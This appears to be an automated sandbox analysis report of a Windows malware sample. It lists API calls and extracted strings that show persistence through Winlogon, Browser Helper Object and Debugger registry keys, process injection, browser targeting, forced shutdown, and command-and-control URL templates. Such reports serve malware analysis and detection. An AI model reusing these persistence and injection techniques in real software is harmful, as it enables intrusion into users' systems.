                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404F03
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F1E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 00404F42
                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00404F72
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F98
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404FB5
                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00404FD2
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00404FDE
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405088
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,004101C0), ref: 004050C3
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,{35363232-3538-3536-3232-353835363232},?,004101C0), ref: 004050CE
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 004050E4
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040510D
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030), ref: 0040511E
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00697EA8,?,00411030), ref: 00405125
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 0040514B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00411030), ref: 00405167
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00411030), ref: 00405176
                                                                                                                                                                      • Sleep.KERNEL32(000007D0,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 00405188
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 004051A0
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004051BB
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00410200,00000800,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004051F5
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 0040525A
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405291
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004052CB
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00405300
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040530F
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040532E
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000000), ref: 0040536A
                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000004,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00405373
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040538E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 004053B2
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 004053C7
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx), ref: 004053F3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,ShellRegEx), ref: 00405402
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 00405445
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405464
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00405480
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000080), ref: 00405489
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054B0
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004054CE
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004054ED
                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040551E
                                                                                                                                                                      • lstrcpyA.KERNEL32(?), ref: 004055C0
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?), ref: 004055D5
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?), ref: 00405610
                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104,?,?,?), ref: 0040562C
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?), ref: 0040564B
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,00000104,?,?,?), ref: 00405673
                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,?,?,?,?,00000104,?,?,?), ref: 00405693
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000104,?,?,?), ref: 004056B6
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056EA
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056F6
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000), ref: 00405715
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405760
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405771
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00697F48,?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405778
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00697F48,?,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 00405783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00411030,?,00000104), ref: 0040579E
                                                                                                                                                                      • WriteFile.KERNEL32(?,00407C80,00001400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 004057DC
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 0040580A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405819
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 0040586E
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058AC
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058BB
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058C6
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080), ref: 004058E1
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080,00000000,00411030), ref: 004058FD
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 0040591B
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405927
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405932
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 0040594D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080,00000000), ref: 00405969
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040599B
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059C0
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059CF
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 004059DA
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104), ref: 004059F5
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A27
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A33
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A50
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A5C
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A67
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 00405A82
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405AB4
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104), ref: 00405AC0
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00006400,?,00000000), ref: 00405AF8
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,00410A40,00000000,00020006,?,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405B2E
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,00410A40,00000000,00020006,?), ref: 00405B4F
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405B79
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 00405B95
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405BA7
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,00410A80,?), ref: 00405BF2
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00410AB5,00000000,00000004,?,00000004), ref: 00405C1B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405C2A
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,00410AE0,00000000,00020006,?,?,?,?,?), ref: 00405C9C
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00410B03,00000000,00000004,?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405CC5
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00410B15,00000000,00000004,?,00000004,?,00410B03,00000000,00000004,?,00000004), ref: 00405CDD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00410B2C,00000000,00000004,?,00000004,?,00410B15,00000000,00000004,?,00000004,?,00410B03,00000000,00000004), ref: 00405CF5
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00410B42,00000000,00000004,?,00000004,?,00410B2C,00000000,00000004,?,00000004,?,00410B15,00000000,00000004), ref: 00405D0D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405D1C
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,00410B60,00000000,0002001F,?,?,?,?,?,00020006,?,?,?,?,?), ref: 00405D52
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,?,?,?,0002001F,?,?,?,?,?,00020006,?), ref: 00405DCE
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00004000,00004000), ref: 00405E0A
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405E24
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,0002001F,?), ref: 00405E3B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?), ref: 00405E54
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00010000,00402818,00000002,00000000,?), ref: 00405E77
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405E80
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021), ref: 00405F00
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00405F1D
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004), ref: 00405F5D
                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000004), ref: 00405F66
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001), ref: 00405F81
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00405F90
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 00405FAC
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,0040F520,?), ref: 00405FC6
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405FE6
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001), ref: 00406001
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00406010
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,00410A40,00000000,00020006,?), ref: 00406039
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,00410A40,00000000,00020006,?), ref: 0040605A
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?), ref: 00406071
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040608D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040609C
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 004060D6
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 00406102
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,ShellRegEx,00000000,00000003,?,0000022A,?,?,0040F4FC,?,00000000), ref: 0040612E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,0000022A,?,?,0040F4FC,?,00000000,?,?,?,?,?,?,?,?,00000001), ref: 0040613D
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00406152
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B},?), ref: 0040617C
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040619C
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,DLLName,00000000,00000001,?,00000001), ref: 004061B7
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Startup,00000000,00000001,Startup,00000008,?,DLLName,00000000,00000001,?,00000001), ref: 004061D3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 004061E2
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000000,CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32,?), ref: 00406204
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040621B
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00406233
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,Both,00000005,?,00000000,00000000,00000001,?,00000001), ref: 0040624F
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 0040625E
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC},?), ref: 00406271
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406287
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 0040629C
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000021,?,?,?,?,?,?,?,00000001), ref: 004062A9
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004062DF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,g00d d0gg,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0040631D
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,g00d d0gg,00000000,00000004,?,00000004,?,?,?,?,?,?,00000000,?,00000000), ref: 00406356
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040636F
                                                                                                                                                                      • Sleep.KERNEL32(00001388,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040637C
                                                                                                                                                                      • RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0040639B
                                                                                                                                                                      • NtShutdownSystem.NTDLL(00000001), ref: 004063A6
                                                                                                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 004063B8
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004063CA
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004063E1
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00412170,?,?,?,0040F4FC,?,00000000), ref: 004063F8
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 00406409
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Close$Create$Value$Handle$AddressProclstrcat$Attributes$Process$lstrlen$DeleteOpenWritelstrcpy$EnvironmentExpandStrings$CurrentLibraryLoadQuerySystemTempTime$DirectoryErrorExitLastNameObjectProcess32SingleSleepWaitlstrcmpi$MutexPathReadStartupThreadwsprintf$AdjustFirstInfoInformationNextPointerPrivilegeSizeSnapshotTokenToolhelp32$ClassCommandComputerCountEnumHeapLineModulePriorityShutdownTerminateTickVersionWindows
                                                                                                                                                                      • String ID: %02X$%AppData%\$%ComSpec%$%CommonProgramFiles%\System\$--k33p$.dll$.exe$Both$CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32$CreateRemoteThread$DLLName$Debugger$Default Flags$Extended Flags$IsInstalled$NtAllocateVirtualMemory$NtOpenProcessToken$NtQueryInformationToken$NtShutdownSystem$NtWriteVirtualMemory$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RtlAdjustPrivilege$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}$ShellRegEx$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$Startup$StubPath$ThreadingModel$explorer.exe$f$firefox.exe$g00d d0gg$iexplore.exe$iphlpapi.dll$kernel32.dll$mozilla.exe$ntdll.dll$opera.exe$qnd_b__-13$rasapi32.dll$seamonkey.exe$tmp$wininet.dll$winlogon.exe${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}${10F5781A-0D97-0F99-EF77-BA382916E579}${35363232-3538-3536-3232-353835363232}${9703941E-446E-952F-954A-3DA8A91ED84F}
                                                                                                                                                                      • API String ID: 3095950084-4185103068
                                                                                                                                                                      • Opcode ID: 4ae22fd395178a40fb2b731ca0ddbbf4a0eb69fcb7669483abc32013d55c88e1
                                                                                                                                                                      • Instruction ID: fcd3a91cfab7fa25ee27508f4df0295c9928967f58dd1d1f7e7acfc0775f1f2c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ae22fd395178a40fb2b731ca0ddbbf4a0eb69fcb7669483abc32013d55c88e1
                                                                                                                                                                      • Instruction Fuzzy Hash: D1233BB19443406AE630B6349D47F9B3A989B40318F140A3FFA89B61D3E77C9529C79F
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004019BF
                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00401A0A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401C12
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                      • String ID: T2A
                                                                                                                                                                      • API String ID: 1083639309-2019523081
                                                                                                                                                                      • Opcode ID: a717315559cf9e37052940ac4f720aa2865e6750b4b3c22cba3fac3a866db69e
                                                                                                                                                                      • Instruction ID: 7c6136f779b091b801ec7ced044d4ecd4f532b5644714f746006db05a6c2f320
                                                                                                                                                                      • Opcode Fuzzy Hash: a717315559cf9e37052940ac4f720aa2865e6750b4b3c22cba3fac3a866db69e
                                                                                                                                                                      • Instruction Fuzzy Hash: 627108706482009BE710AB24DD41B9B3BB8AB45348F04453AF945E72E1F37CE669CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,004047F1,00000000,?,?,?,qnd_b__-13), ref: 0040284E
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 0040288A
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,?,?,00000000,?,?,?,0040F4FC,?), ref: 004028BF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?), ref: 004028ED
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00412170,?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?), ref: 0040290B
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 00402944
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 00402965
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                        • Part of subcall function 0040140F: wsprintfA.USER32 ref: 00401422
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • wsprintfA.USER32 ref: 00402B23
                                                                                                                                                                      • wsprintfA.USER32 ref: 00402C22
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00402C31
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$wsprintf$CreateQueryTime$FileSleepSystemclosesocketgethostbynamehtonslstrcpylstrlensocket
                                                                                                                                                                      • String ID: %02X$%u.%u.%u.%s$Default Flags$Mozilla/4.0 (compatible; MSIE 6.0; Win32)$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$g00d d0gg$http://%s.biz/d/N?$http://%s/$isdn$modem$tmp$urlinj_conn$urlinj_creat$urlinj_creat_f$urlinj_fork$urlinj_xfer
                                                                                                                                                                      • API String ID: 555275688-516498188
                                                                                                                                                                      • Opcode ID: 231064a3baea8be4ce091cb9f8e053f54118fb441baa83095cb5e2203fae3987
                                                                                                                                                                      • Instruction ID: 361da06dea62f3c206a16b96f36873db8e41f07557a8891ad4d22fd480433f73
                                                                                                                                                                      • Opcode Fuzzy Hash: 231064a3baea8be4ce091cb9f8e053f54118fb441baa83095cb5e2203fae3987
                                                                                                                                                                      • Instruction Fuzzy Hash: D8721B70A002045BDB20EF34CD4ABDA7B75AB40305F1441B6F909B62C6E7BD9A98CF5E
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
